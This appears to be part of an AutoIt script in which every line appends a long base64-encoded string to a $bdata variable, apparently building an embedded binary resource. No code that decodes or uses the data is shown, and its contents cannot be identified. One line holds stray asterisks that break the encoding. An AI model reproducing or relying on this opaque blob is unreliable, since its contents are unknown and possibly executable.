	$bdata &= "LnH31sNagqNSqvCIDlGn1FI5O8Nfup1qEYkcB0dQRbwtRT4sFrq9pwW4OVBdhCQeaF3/sACeGtoBYgmYAfKAfDXYABjP75R4rCe8Hqgr1jwRY0O9ke4TK8K5ZZjBF87aINIjyMjKfwnOwIuq3SRkjQwfwXaswzvBTHs2YH3DzrvUoihmd2BUuwob7yS0ICd8JOreK8J8mtgKQIN6jmkYHIRqyQkcaSQCj/k8NRUu8ICZWOVhjOHgVwgBuOENnBZVRtvYDSmFjUYIa2IBNxKkFCpUTrguFWOdMFKDOhb8micWXGQsfIlduEUEqNFGKNUmTTpBKqEoVsC7eORo5ZtcWIPBUFaE3AYwogeF4wJVtTlbChkno5yLJ1CLpkeDmEmEpAGDg8y0uCIYY96nU23iU8lBd1h+L//mJeNeHxh9MotHVIscsO4FNAAIENE5PFPjE2mFaRZCfNW5ZOwlI09QHa/Xl4xbH+FMuxnkFAhfxEgcVdOQCTDAv"
	$bdata &= "aMwIsbGZBid8YwnUJY4samO9dYOMQ+EQc4jQLTAzBarht+O4HxgDwOWbA6+AvclCxe4UMBgukR5GbYMMB0jjQ5upkwUedwIF8h1DvVAejn13kiGeFLrCjpIipVXuyjKV1dR2ByBQeUtEBh+UeR8EHLiSeoYdkRDhFYAbFNbFLUIOmguVmhBsDvzj0dlFDFY1OguZb9KqBs5WAR0FhCdXAYWPthqN+ih8jSXxkIQeXTCdTjGGsJET1MA7ZZp1kfdSGCTmcvYYKlqBZCSfHcfAUQgU7CuadALr3kZx2HcUdUolSatKIjEOLvGgd1Fist+T/UrfpiRhkGYFJa5XUgaAQLkq1Jy+fgIOV4sss5WTnljCK1UGCGtdy6Ai/A4cZyiA2kzMCijgezi6Uor2IS0fZ09TmM0kEeBfAH9GThYKjlwRHUG4TK5zPwcM6E1/vgJi17SXHcqbAyCQEINSGLtGEC0xA8B34HBS8ahiihpw4lvblRKjjA4JG"
	$bdata &= "ox9KhWxisWlyR2wYgMn8B7/pFr13QXTFgCBFfB6Bv30Oki9DHjFFGXpICxQQ9HEWhfMtZUHMY0RwsTraLYziRci6khsOJ0BTsOfgZVJABP6ETjEJMViZfA+lXtwAr6pHSFCgPIQBIQaOScTDlMqBfwxSQrTiTFVhrJCzikvyDE0+kWVEJHZHiD7VduUYx1IY1FDOtmRlCvEeDUhhyP8bBFYgj8aPhKfbg8ruedwMJmvesqGBAhB0CVCh27gMx4k5LHg+gUrRMNDFyIE+sFCYvIhRfj6ykgUDa7sh0Ym/WGvxA4uD3FSOXsDwWNeNLrKMG/Dhsom//2D4PvvN8b/4Pn+YPHFL8NEFb1JWegV6/g1jSMd7wqptPGD2AFwKNUHwdyMr936NZD9j4IsEsEjTyXwNfAgmdoA7Q0cNJLNXDIA8v9gSOGGstsIPHwfLlpYjCNUbM5pRduBi59lMVjha8M5HU6OTof7EhIE3T7PtBDxesktAWgDRs"
	$bdata &= "QPnpBPCGioo9oEjyiGnQEg57bnYgnZivQmXV2kZFBKhdAw0CCNEMb6YgCNwmGhsFOg/oJkAvYw34184MIOcNpQviIZxcD7zThgQ8looibPEIKa14FXA0diFbItbbGP1MDZgy2CQc/VxR+iF/tBhpcWY1WQFIVB5ksrxOv/XQkmKYUVheNXEQaqFCEkGih5UkBwD5wBidw8YuxujMGZCAaPO0DApKnuUDwEQFRGJ5GrnPzJVd0gCL3CHOAHDLKBvM2g6xPEgUAsVerYQokmIuP6VA0C0ZHJnusbDb0QqiJXUhw1lLsfYw9TLyX3QH9VNiBfAPXie/lhEdRrYx0eLn0jlK9KEYsGqdydEv8pvx4OOhohHVTaMGffCpHPT6uMIXbxwTw/0dIw1VIhUAGa4dZInGNdW19TbWSRllHqnwD3TyNJt00LA1+MA4au4B5Cfd8kMrAxvd9P8SK7DlkP1gHekOPQAew3iB2PCV8EmSKqn4Dk0l+wHo/"
	$bdata &= "SE5rQgtIU78y8NLkZ+A6Dcg08kgQV+DqiEReeiXA9vZmVtC4q6oA9+KL8iLR7uorUM5tUA+v85EQCXogmBvECsEP5fzAAbCBn7Bq/zwerA2zAQWcdigM8msGMKy+CAdHKQouGwJnybiIgtIKkyAf6DRIFUbcEPhWPYqFP3BXdBjqBMtH+1ThhFA21EDrFi8nYYEOV1C3U5PEYnxXHCtXGDaF0kgJyN3vjkYMd6x+dFhJHisH3GyfwzveoAo/kHB0GYN/AhPgvmkKMcFY99OD4wE1Tmu46sek180voXZbpUlP0jCL6LI0w/VaF1rIuiSirEWMX4VDKQ8sVyh+DokKGCyztCm0zhQLntJ8bUpE8O/N+k0QTkI899veKVQb21DLpAunPmN6JjgEPDnCdnO8Xm/OdBQ5dKW6UCyqDVZnn7sI6xAnFCjk4g3ApcmVthVIJBRNtciddhGOMl8WQFAjnYJZho8FHCBWg84OX/3ZOIlXaZDYkChc7"
	$bdata &= "ATeghhUNgZMgOYyr2RrbIusaVBd6jayoYt27LYWqKR0jsyXsViJrE0kwQW/lOOL0FwIkU/MhGgobq6HGZNwULBjfEYQB5zgdUjGh8sGgwXxlHVooQyzYNZB6uNJomCGEP/C5LeZlqo+CtgB+BDB7wIpBw9H8SAQsEjeukNn2HxUdGztHZv41fk8bkHH6x2hlP8FlBpDO8Z/BDvOfkZGuoCbavhXVuJQVuGGpwXmSZc8V1Y4wJ+GF+1kOjAPYHwbNgOwLRBBPAH3dxFN89r8yCB0EL+TmfjfGCrXUlfR+NH5GlsjjGMhhRqRPA3ZVjYXfJWi7oT7g+L9+lLcobBKeSC5i7y4uJKlOvzTdM7A816jWAZcYDwuF1+QQlDk/IwhwwcvPVVJO/6C6S2cYVYxPXXfA+TDluEjOyVBEGrYLeNzI+9QAYPDz3TIV6dgkUFEfb4gTLVWMJhElV8PR0jDmwGgeMOVziR8C6fH0N6huxmZi/tXNlOn2B"
	$bdata &= "oaziFUoFajwWADORDcnRiikUzc9VQK5xlek7KYQMs7mhGU/bKUelQ47084pAljB/t17/ulY7x/cM+cYZTEp95uuJrKRoAchB3a5nlhhR0ey9MDz0cl8C+NzHONUwHVUjd7xveBUfIciSfAT0FnEDsNEc1Uf3ROKVxJ+jA+dUfwVoQFpGhpU2bpLE2AQkyU8NfzTDsuelwOQESR50Clw0HMVVfrCQZrwnONi6XiV6b6LLHfLD9Aw+sezccgI0AO/Ah/H5b6SNQCi8PS0FxTzOWYgVC5eHyfITsG+lUc6FDMfNw2AyWaCn4VvxXE2E3LossCkVdwLCXeBU/rcCr+Eg0/KMlWuVSaDgNEUIxRYYPeAqQ8Xl5MoUAB5VLMI2BqgYv9SBpA5DthesKPRBVQ2qgdjNgjgYOtMoxRsTKUXOAFaSNSQSKkuDQV+FckDHyseFKBJ80AgEcoRx4hSTMGhBQ8dQEFklQUI2maK+SiBFhcYAEZALlkdG9"
	$bdata &= "Ja4W4kmAoUYEASeWMKGgKuRxFNSgEBRZhZOxEJzQXIUdJUJ5wOJccJGRgBcPikP/MpwVCEGHLIy5HyADoKAhy1LBAi+y0ECtGsTUwGBRY9S9m0gIvKinOARuUC5zZ5Zi0o5wXgRMZzUicFQPTgT9oUjhQG0wD1xf40DmCEMa8W4DESoE0cW1LIPtwD+eEQ71cKkOBMVFLRJFTgIEt4AAmTVOBXDB0XHQ1VgW+2yuy2UxVgStITFbNlFwmaGxUTMLIISdICZS4HFIgVPxSSUMUBIIWIXX064ARdLiSj1Dxh4klnz/on4YcAHnEgyegTgFhAgowxhUK8qI/RRCzEPIBGDzfqHzjQxD/OdxqCqSkDVZICIqBFykNkgmIfOUEQQh5SH9eH5yBUTLYn5epQw4AFLQpe6Lh0GQlVROgBqlSCliqrQgpKIZkBwSLKAk9UcpG2BTJCEmhSBGc5Z9lmV8wDFbJxQhFC8QiBgaSby5Abxv8OKeg2UTl"
	$bdata &= "BO1VtzaskAOjnJ/rJCPShCA5O8ZSB/9bcLAli05Ui1YgUWr8q/USgAKsFhOSYCzjTATxr2Bu5t1ySE4gUIEAQCU2YEnfBmEiUXIJtRhMBJKqIlR/WAgrTShAJd0KwuqEf46IOJqlZEvhdpDKeKmLUADeU780ZRgCXPi73wU3VYN5ZJoOPTIifO49c3/nJ+i/aMZomuCLUViDegi2foDl+klUO8hyBoZQdchhaIEVV3FPPZLYn2CQuvZO1LNX8HYHSRAAOz1kJ/FYhugG1BBfz6Ex4d57N8MWlvHcpRgMAR0MUKZhz/KnvF8I04VaKNvfK0wo4yy9ieDXuS5bNTBuChENkOWKbQxYUdFePLeMlUM4ajKGRR2tSQwMSGmSq/wqLFEx+LGIao9WwSXk8FvGEC4POcHXm/jodQ1BFY0EMYjALaM89T4T2o6x/nlsNnkg5AVqYdajL1gjkHu/DxKHZFDsPVkf5KuhjQMqSiQIKVJHv5ZrJ+LCg"
	$bdata &= "veLpvQVqCdmZVOLWQaR0rWNGUqbG5gPdYojBKoANchXwHmjoPdvPoX/dheL04syNg9i6DVTstSK8EvqIUphrrNJGgR1GVYMJvHNAmAEkjYTYZrd+40Ek4s4MgoeZF7RBF70lMl9cIkBUeewYfBviRBuItMmrf/0N/EAAJQJXhNOGNsAEHX6IOjbRG9lEH1VWWYogQ4Iw1NtXW1/EH0BchgnrGRLTwyTNEhABMAFr31JCrk8UTULdVKHvH5/kyIiFU24X/8/XYVWeW4Yp2QYGBPkeWad2wEYzl4gHGoWWuUcHBNfBF8ybgFRD7/Q1L8geIWNwEMgAF8ZGiCHBNwLRZJe00nZ60lao3HY/RsthBy+BAn3Rw2DmfXUTp+02ZJaVf8/YByjs3AIuZjVIL2OwWQxLCCuVHRMzUiRaPSB+2WjB8dQIIXSXjDAL7v0VWlBIOrv0tBb5V8WH0kD2w5Mgk8JgPRufw9QxEcCdDMIA3QuC6RtNvZ0KW"
	$bdata &= "QEMwRcdgZm+v8IcmALsEc//y9YDw/Mc2fOLsYBC+uB6PShUGUG+Pm0iwb8bLsfOA3/OLcIuineQwdWH4P4IMx0bb2vNmhOdDc9EVR0vHx/XyoGdCs7BdhQdR2h505QUcADoYVD00TqOkXdJHwo+f/FOOmNRWRJqCTdwwj6g3Aa4BGeKP0A6COoPLCNfUgcrcnTAjAgw2CtJAFm6AhsJDyUCWCcUEm6/PIDxfPLfApgWQGNH0YTR8R3fSCZC4P/aBy9NHiNRnR1DIO+Af7owi7JUo7RcRSqSL0HcueDg0I8ljczwCMVIpoC33//aIOJsf7P6DQLOrjlKqR02tYs1wHYBfshaR4fFhKQmqaNzgoQCBTxVwFHHhAwUQR0E1DHQmzZAzzzmkzZJEEI0J6thb/Q6aBr6h3mv7ZNB1E3sxNdQi9B30howevCi8P3dQhWMP5nMVeNPJF0Iv8WtMj6OV4MdQ9baEpsfTsSFESZEPhMdeMaixYsfEo"
	$bdata &= "LWg9W7eRd7mNW+zE/acznTkEh3znuFBSQGNqNFEmCHqVX0Oh4GF/mTkGf3hDdGCA9EJDulglpaaiCgGDyFOTB1cnSo5xWCQqF/8t/gkifU1Z0N4X/diw/4v0eaQeL33IFuxFI88HmknSRpASb+0F75i8q/3fZXltfXWz1Y5PbkaSXa9WntCJJl/9kIBqyxZjDHNAnEwPBjk8dQrWOQeV8tghHqZI8JAWgHCs04yUgw78ROndCQoVqbIulBSWReCDpDJPGSAQUnMJGaMYaNgrKXhmBbc2XDAgTn6elFliE5wy1gKeT0EqGBNFGeCBjSJoK2gAz918j/wis/8rENaYINomsJhO3Yfb/k+K3ANNW3qNTX+C/iwY7SPR9GQ+2pAPBUCpI/HTfBCsGXsPhQDY0lR/F0y1xqAdiHjMoGOm0ZHMKAB87xzvPLh7yI1yNTnRqCpNbCxkvg0wHWARUx2ia1t5GaCZwEmAEZGxwV2g1wpM/xiAbrJIO"
	$bdata &= "RtcyyVgBC9EqAAyuXygZaFQh41xzAAvkVY96l6LuFSc+xnFYV1GimtJBrmgMi/yJB/jQxsvnOlNZw5CJ5BTfxjhkjhQDwKIcTkiCJI2AEBxD6TLtFDN0HCdCSFAgFd33uYgaTZ9aCASAgvppo2kBYo6A1FGZVwdMikm1suFQjRPRg8ZPM9WBSCMd8IizwWxvhRbDaOgDAAjNCqhUCF/R0F77HFkKk1+PO7AcZUWddtsBtaVwRHR4DkzqpaiycFBpovnEixCDuEQGAPfswlt83uJ0bPYWHGpDdDglFC2qqJcmaEIID8zAYgUEixRWDFBSdBHMJjo27CUggAGPCdahgIuGZyD5H8Zo8VMryxVPQr5CoSROUyeKU49p3NdBrOvCZyQMVZpSfs3PP5R0gDIIv8Y8TSBrQ6gOUWysiXS3NDyAemvGiv0FXqNjpjgZieJQCyswIgbWEmv8I1FgJAVTH6A2r9/TPpILNDAIX11UJGdKH7yUCE9NW"
	$bdata &= "JrhZ8ChUyJkFHUxACPoQ9KB+4Kf5jQ+N2B2cEypQIZPqpAYV2doIDlOWWGVsTi88poBGHSW/okDiXONp6wLUECwvwfdH0JLDL8BxwwCV1DL60qN8WdZEHQIOzVFPMrKBACtG0Vtd+VVrJJEBzoDwFvz+T7xc1peX9xTa3yFQjCgMGMgdg5QSjguy2MssaxeguP7M1IKzmBJIJtHhbwCf8bILEA6WiQPBaRKXnHa0ktSCl9nIEuSYnXZLCDB+lKEZ1KuSSrRPLy0VghSV/hqNlbu9Y2AAGlRYc6Qwf3/IZBQb+D3AWX0Wdf1bHxsxCIggOBHPBVCvp9tvB8nqeUp+1eL8TsWoFZguoAQAZeAbwFDV3UkgIXmcwwvEQ5if1f2z6CX+s3EavyJRnBXeQRrbXansgFxgCRARlTV17qQ7+sXMcwF3FAw1gZaxSjWLkGfiwBXGnzgOdg8Ud0Ezc4hn95oZPIK+d9YAVcLSJhT8njSWANAajAJlM"
	$bdata &= "EwWeMdF9/C7dvW7D7TavASQMfxQWcQDTBPvGppRGqWekB/B7pSUTLcwdQgKj9BqdEHT9AJUYZ3IGRadKsQCdC9uAWkcRNeugV822tqAiV17VsMbGyxoUlo34S+gnSpRx7/xvgpkKdAAXK8fxMDG34md1T3PHgvtt7uG/YoYpCgEPe46A0FHXRZhSCNX0jJAucsf7DXeOjxLMvyeh8HagB9dBaBKnVoqQENgClVvKRPOMPrCAV1zPG226olKRL3AazkyQffxyhWV9iayhJYHyArKwVXNRz7AcA3ONMcvbM6MYkwg34kBzZtFV6JCusKzARSU5KRCNBFNhokYhNnDBBIXkR/x1iFDTNUX1SHnIUx1+0OJ2nUYHAIN3UuUEBYhVhVSecuYMRexmNdJX9LgR/HrMYNQA1sqSw4VQcosgsSUSjvpkjEbnquMTRVu+e6h7QA4VV11UckcC4K1yNVZLKAHtTySjDTQUUA5hfhIMJuyf8Gzv/rGmo"
	$bdata &= "uUScGK3nTWrDM2n4BuQbAqpNCe2yl2gboEMB0ZCxfPmy9IIBbtVe6pclThhw4BxCkydaWFEvLq71WsIuFBq3OmcZ3fH9e2HGrq2K0VdGVJ2h0qBB0psrTcJ6QUCsB0IxL5iNqROxGZAEZlv0WE8/rbMvJEbSkwwvrRl0QNIfhtADo7RvszDAsXQPz2UiLBwgVfW8INuBLCKow8gFvY+g1cTUEZIc/K0MNZEqNS2RlfUSlDX5YsXx2yfgpfEtIVWZy8LTld9bXbgllxG9SuKU/CAiQ4XR8qkcMuJGd/wtjIJna8b7/kPWGV1d1U2F0E4ANKxQabg6gica6Zfw66y9qKNmHBabTcwtKPOoFysljPBRJdsxI9tCK4b/IyEWyDjbvDJsBXPswDvYxwPVQoDY+MYgmLfCyH3TvuUb7HwngHXrMIAcZYJ0BODAG2JIul9h1ApEMyUEx3MTJkBxyA/i0L+QgFwRATBAshVROBPkQLKjkhRx2BZdQ"
	$bdata &= "eC2cuEIqJy2cjAaRDMkhpUWgfMmQHHYHdT3UcIbkIBcIVeBcJAe5SAleeDnIRTJMCk4MQS6SITgLcpEMyVvwJAyLZEgOV8QUJENykA1HuAi8kINcDlNcLPhIDnKRD1oUcpCLZOgQLkzUXURD4DPYKdDdmxxbMyHAY0O4S4Y2JLAhqIZkSLo4qZiIeJPu2tAhbGXwIWALng5CnwyEwOR0I5AHTAXpEaQx5CBXw6USSjwVuEiGWBNhsLHkG29MGLM4Ikm4FRsCofkJvy5sxJ/7QA80h1D9u6y+9mkGfDv4iYZ4TAp8dQYPKsEbUr95wK0EtwH+hqj8ElTCBwd+bS/hSzlRdPRGYPJumEnSc4la/qpmU1c4ioGGPBBVDdxTsSQPw18GpRL+gbw8C3IGRx0VgdXA670DqUp4y2zfl5gAPjUIDXdOwKkBKQCwh4ClCNQUJNYEgautFOn/LB/BEQWfIEUHdHo3xNoYg3KcmlFvqdeA/awG9Czws"
	$bdata &= "Y4w+B+oOzJMDfzFdEcXUuXYheX+YVCDvhfGRpCTjUcdPlGEEDeswksuM7BtrIGlHpsoLN7rt1hTi6kygedQEHQQLfjAOUcVOU3lR4PNtkJyEDEMNW5QsmsDOSJdcOGQfETzKV+wGq4Ndz+A7Bpo40a7VTWwqZAfQS/DIYe8sj/IQAwNuzBUh4XOx4+UNseBg36khDc0bXV7CmR1gWoxYBwICZvYpaekanwkZIsX5Cg4beBh6osvpC01g2r1YXQsCDOncL+DbHHG44gZKBT6CmbgERkwGHIPCFjToChTbSJSJDx4hSVuZNQqA1juPzyNuhVKaDWcwhgsDI4UyTRouXysyS4gE1lReu5PSShnt74NBIEhIQ1BpyhLI2n1cwDAmI/bXE44Sx4/8ew6nDSQVL9f1HU4VLvEngQ8xmDC2veMKMqtePL2gf8PyLsu4JTnU4DZM/6A8PCB5rQlAAxoMY2jrOaO49HqpEOFBAt35u12UhC+ResJFA"
	$bdata &= "XAREZlr90Fv2ODe0gVvvViUqYLvJ8QVokvLQ2Yqhi5DdAyAB4leQbeU9/nVmoCM9IHM8k5VACWgM4WnEBILYZyAIg0VgsAa1wytADHXd8gVH9keaurrAVr0SCRZk0A0w5YHqv/9cNJ/aDqdUABsiSD+g8A4CcaKPo+dReNgHgqxQGDrF8HGOkZmwnQXsqDFQSQTD8sri4kblZoKAG/bE74GRgFn9FQTwPhy78fg8j/C9BSgnzDj+7qlyFYdQlNXZwIJHDFR4DqsnQRTwjfdJw65MlY21TP4uSq2WBWG6Jf8JSRo2z8CGzLloIyB7NoDsooSJUWYEcYZuFwHWTD3wAUCoUXfBQkqvSgpgL2BKqBDEYZGzgEBHWbUHAjjP8v3MOf1IUc11j/NEgjqAhsyQcVVgID5TMvMq6oTYaLVyBWArbUFHGs84V8xqT+N3FgjUj/g/kGD4fpKagi3qaNCoroPw6Aw9zUirKUH4hSQkiVPNlPa0KiX7K"
	$bdata &= "KpN646gw21JTCHE4es9wegbObsgwAgiRS+s7zDggcKnVhlJYcGigA9DJt3wAVDutNUiw5CgeMaBsEQ8tjbl8AugOl1qANwSC5LktPAwICyHspvarsdcNkAYQKJRhMHTx4l7l1beQcA0Qm0hknHSn9qCB0Dh5mZEmAgw5tjpYuE2yBVgiJycG3P5weThw93IsYgIPDA6139iAIKV5ZAR4NLDNUuvQUDB0cBeBNPPtqpEDTLmWOhygq4Gt4ksmNjWxNwzMPDpZQAy1Kh7HWzwIei5BGqhxcUHoBFosGdsVSJNG34CE8vutHILn6Wk9Kgu4riEsBpgzD03jvxQEGR0AmzJlCBi9gR5FNHR7WqmNSUUcp4KjnUCAVCFR1TEhn27VwQMD/8ojyB4m3VPVsJ+smioLGX4Qcl4AfZBUZCtV4T4xs4CDwLLEhjkYnhiDirD01Bwylu/QvJIiHg1mgMBfFgOOhSy8QsHQUdwdRQzsS/qeILOskjBcI"
	$bdata &= "glK2LUXUbPaIPWGmmc7XZiCHzmnHy1pqzrJYMWoBJvyEwHlAiCgAvUy49l6L9WppjTrs0jhGHQJSKKNgi9TpGDpVhY1t4X63YahAdDaVepf1LYxchhhXZEZ1FtN8FIGQh9QfTDlo9HUgQ4DAMAgnkP9fIJUA20HFECEMCc876MQgF6ZABkRMrQLg3ovr6kiv4oHNnEJ8O8tVjTZVUYRolf8/dNpkcaY0nEQtpDJ9GFJrKZDqSdBCSm3PKvQOrNiuPfl1Lxty1wXxGLiX4TQ+D+u131fm34EYhE7HUF4lVz119rSFSVA9WTTW9V8D+JdEjejR/YPLAT4Ha8+c3hypzGzoK5u2uz3GPgLrLR0zwCEcYFveGsgPReapzB48LAj3DARTXHmekwg8GDT40f/XDhbADlODXAD9OFsX9Sp8Vvg2GEQI68ns2LkwHfwhH2cPeAKwYAPCPLmJO85U2S8FCyqDZbzPGAyngF7hMOzkxxHDQrvEto9Xl"
	$bdata &= "uotmi/JgbYGtGJHY3MQCQTtxhcIsVOiVfghaCn3LNRQ4ybqBoHLWFdwLN7Fy60nMs/3xZN1L0lIxwPNPhbQkHqIU7yKA/QwpMXgu+jj14a0UOsLU3dNuSArba/wACE9BpqIXqOgJ0dwu9CFeIglUwHj2sNpLmCXFPtwQR9MXmtYpXUVUyJjWJ1JQTWMi4ehsfXPK4hht9EESlgiBpTsYLno6xFZK1Q0W3wAnjCQQgOtZG4Z9g+iO8J8FTmAgEgz+/UGGG88x800XDnJyVgwqDRsJDDzPCOHPDBgHJ7e2F19ZzjrRtNFFgPlCst3NStmOGvpp7GbxdpSIzaUY6a/tDHEWx10Wva4FCwwrHB2Kht2BC8Quka41/DR6UCmOH14cOU4RF1ZvzDSQnvog7/Fi4fAAPjXi+cT25w7RyBisbF0yBSBPAy9gErbz+qHUKJ//E6zi09FwWt0Qo7oI+kcX2Xoo4TRhWx9SEiDawR0lj6gvVk2vg05jE"
	$bdata &= "00/1cqr9IoAiEaHAMTM9LYECdB7NcUlUkBJzwL6sNgwqVkDbVwDpe0oiDgbKCLIJilYM2Aw4MBPiAwmTEVqc/ti00w1pEhN/oIPE2lfVVgUqY8CQ5KAqRKU2meAAOcBpSqNFWaBYwHBp0GJkD3D7L33VEb7bCCFHjACHtFLATQvaODagXb9Tz8oaX9JUwiUQwWahJIRuogg0gjAtK7C7uAfw2pIPK1SH+LBh3yMBxgGA4GB6SCERqMiIIOwmuL6QPkA0jkChb8BIP5AnULpHQEnHUfCFIwEv4+UhSQ5HmqMAPDQWBwQkM7A7vFCIJVO9XJBcPBORcCPQ0GWyivSXcqCMFSbxnM6U4zodCIHD/fkDy***d0LxrFwgaPjU5cWWf1tjcGeAfoWK83xoZ8/7fMtizuhmwW1cUoIc1S/+r/ECWkj2iAAu2VkPbWFweULONrVUIa2YackFf/McAyHF0Nfoc/dC2DvqDmJFUoBg4/DToAgoVDFkM"
	$bdata &= "A20mQPRQOmT/KGIJ7GKuusVKMQxb3T8pBoVAcSd+sAXDJMemisAYGgZ+SFnD8MEigHHIfGmtppdSUrjjTctRIxcy8TF1QO14C6tYhRb/42uNjcP9VNTOUrWZ9EPU/y8j4ZdIGC9WRU2swVTuAAE/Gkd1qIB8CAk4PPeDWbm2b38mZZEKmdHR0TASQIH+bWB9cUCN3GrlRv0pw6yBvP8DcdVkf8TcmHKuh8WHAU0AZFABHDsoCGlAO64mfIVGxqRAYlnYeNDMBDjjf/FgMgZ8+l7yV+LKEhfdPmyoDT+kBdfTvBKOwdZYsw21EoyneqFYjYe+tEBI2Gn9bKGgEb9gegAxf9RseaH0h/6S17GkG3joAOj0vapT2LCS0BhDXOYM83xccBC1RCFbf5Lk8AVICiQKHDMghCQMRAQoyIAVXyCOAFl/KSnSsQA4llnwygVw0HwoKIBPIBAoKBjKBTAoK615fs7+W7MMfNQDDYk/Ig/82WJp8zB8l"
	$bdata &= "LwpjjF/KeJ/NR1gg/2oID4x8JLSrCpggmomRCnhgjBThE62QYDAsqfdWsnIKf5q8NqwhhDQE/5WQVyQbn8qqmrycAGYp39gfgSRHMoCUMrutP6kDPFJFAy7QSqydyDYDWyS+6klMSVehmGa5QoWWYBsNV1pYgA0sqQhGBmwkr4lZVJ5heUYgBEMBfAFzKbP3BPySPrSsz/gBqZLwrV92Q6l0jCRsIoJkDV1Qv3vHK3os655VQO1sgpQTj3OUDu2yxnKD87LlhIa4D2o/AaHjh+w3gxwlMXZYrUEM641xeCylg0qA3I8A8MPYoX7+u6syco0EMhq7DOoGQwGgBA+Vw2xGAmJqLVMOU6ZUBEvC2ix8wg6zheZ0P+r2lNgWMzADMjjpW1ockkwSdalTGZdQdVAUtjP0N3frQ+NtBB0lYQLjNI0oE6edfTSD6QOaanpEuF+LWrjLUHQDYsL3XQjJIlJV/5wA797POXVphd6NgDcQaggWwf2D6"
	$bdata &= "FJNDJWmAqL/3ES72wyTTKqaDhgc3uOyVciN0lE3Ala6BC7hosYEBp7X6KuT8coT+7SfDhCw1RTcfT8LQisBFseLcd+IXLOE7SwQKYIgAuYop8Fy8Cu+LCNUF1QQ7ggDzh/cxv8UWwYLAZXctNUSWrlSOZUnz3NyWFRcYFyaCgonVMJUAd7BoQw5PiidGmSDcAI79YnEz6Q04qCiVn44P/9oVEhRgSQE+PXGjyYt1gRHOjz3JCLLwJuVr4MW1gZrWK2wM+FEnyPY3o/VfEBhh6dxi+iOZAgoo09QDCDfEuQ8PBx6k8EawUcEbALBYfhVUFPrRYAO6kYBhUIgLL5Rc6k9kQWRZ5AtIc0wVSg0Sb5LJWpT0v1XJI0AwtP0lKHSeCisQbwi2QGfywqbPAQEXoTLQP/AJUcyvNBPKDI1eWIoSK8B4dIG/3UPd2DSSyPEbyRpdZYa/Zz3O+CpVxjyHUME33QAIw3faM+22BgOAM9hLQ8dhFd4yx"
	$bdata &= "roVZ7AAwHvYcZUT3+AZgHdaHF2h7C00kLZvUuHgTULfZ01XaJhSpI/dA+j9ECguMbBWjDbjjxWkJ2MF68AAII8FInYBl6J1s8HzVFopbWHsO6hX1hZCs8NGLsDy7WkRCeYxPROgrIVKSQE2VZnQegkD5WREms5pJkBn1HLPGkry2DhqYWGVuNESPc9CkByc+r88QC6I0gBIPCIEmZ/LAdVgJUP4ALWNH7tgA7m/hqDwf4nqaXpNCAU3SfAysBRaD4MkADh2KFS8AThAeFsmd8DgQ/lpCYTxNAr9pt4W4Ks6gOfTmOQ9zRVoBho0tDqi5FQKIHraa1kqVVNde+1UbPSdIIXiyLPFgw269aJHrPV4LQHENpMY1Ur4J2xLTp1mIcRDGZ9AKWvpaYq5cIM5hrBwL57eYqbMMRZ7qA7OJuS4JaqUGozpNXx2CJHbz3SGFX8Jhgdr0UdRKtvCQDn8NI8dQlVAPoaQMDaZlEj9GDgPMgEsnOXwgI"
	$bdata &= "jmC6AEhYnAUdXTCSak84GhRgcPO2RenE/VJUg+IFbQXB1RVgDy9SRMSFZUJXCX6+WeF5oATiD5v1NXKASOARHzKgHyQz7/CamELSyB1YKr82MhsCnASJWLaWsMFHaRgGGvdV1ZutATFp8HOKLjqWTnAggp623oPXDWCvwVnpD7rTwBAp0VySl4UHp/s2SSfMDSmz3YNjIkDRghtDIbzxKWGOI2lg9AUd8OBeUUKhREFUjlwdbEM5+jcSyFMsYUm8WUoUYmtjUfQTqSCuxpH8Qi/grDQ25c1fJh5NvAm4cHB1SMjgAPvxCAJg8ciBNqwH0ULKSM5XTIQHZ90nplRUwLHeJ/mNguRISOjhL6CDcOur7kcOwQcDOG0BTaX/CV2HS7Cu/yQn5PzgwOFQ/OcQyTVImORNpK1kpKSN0BSB/I1Qhf6dMGZBNWv6nXDCRLq2hV2M4AvDiJWDojnRaeHRVpwB6s+OfXKYoNASwlhztMg4AEQ7qK/L8"
	$bdata &= "JeO0sBj1JQwfHgpPz5VXR701eGt+QF/LkEivknjkjBJhjZSpOJj1DZLplpw9MyRT3Lrfqj+sJA9CXqhcOfgzBJOkIvjNW9RgiHRMXzWpEDK0P3CSoREI30OlRpIGRpp+SEDwqV+sweK08P5Mtf8rUQhd2N8yIM9ziQOkRGgoDukpAyRSmI3sRWwDZkkgMurwqqiDcAEALCYKWh9JWd83g6dwAcHw/NECWoLnBJQCygZS6CJG9P/NnfEbMoBgRBkJ3UIGYJ8JyA6RYT/gbPvjzlBoQ3+B/iG726s7U/l1GAMlGMAwPQl1B5Ox6QJljr9ARfrtd60SVoMPbYP+fXRoCHx0Y4tHWE669hredVI0hUVSSjSVptIOhEKhOqM2lXarMmpHdC04oCWiAttNpXkdhhVGdBAYFwPqlzA4MDB1CgIPUkjfH2cT7NooTx9lANAG4jMIdSmbCerCTd9XzAwrAXGw45vRcZWkNn2fgRj9JA3QIItAINCBd"
	$bdata &= "1po/9kzyd11lTomSx+pCeBist8Mw6ttGWRN8b2NcIc36SC3Aa6vU1do/SnqY+DKg/WL6Ovhn2y+e4O+PALpzbmA74vvIFApNNwB3bmQARApV4gjHDjX12fQwMAXkiJpV+h9bDBBwBAj1IEBZ0t5SQAmx1ho11Rp6OEfgevWDWKB3/8sHaGWuIQMv5ZOOiTMiVAcx4QFnhCKIZkIIF0w1fapsEyNT//rBcKr2vkddyDHhLg/1FlvJmH2EWzYSXhZY9XY9naBinQNiFeLPCMgJBdfBL8GGT6yVEV0fL/mWoI4JqUwhxauwXpd0oXQV10LouHAj/9RavBDWD6g2mwgKXO5XMgMEBQwOpZ14zpo53zvEZazKaRXh1sBAF9Xp19J1KVi4L8ifnh1GpAyqGJxkz1A3LoPt4z2X6xy9D+pp368UDl+ZHUhwp+0gx85uH51FF9Vt/SBq16uhZL2XF7WLWAmveNvgI231Kq5eNuLIc19xU8Qe29fCB"
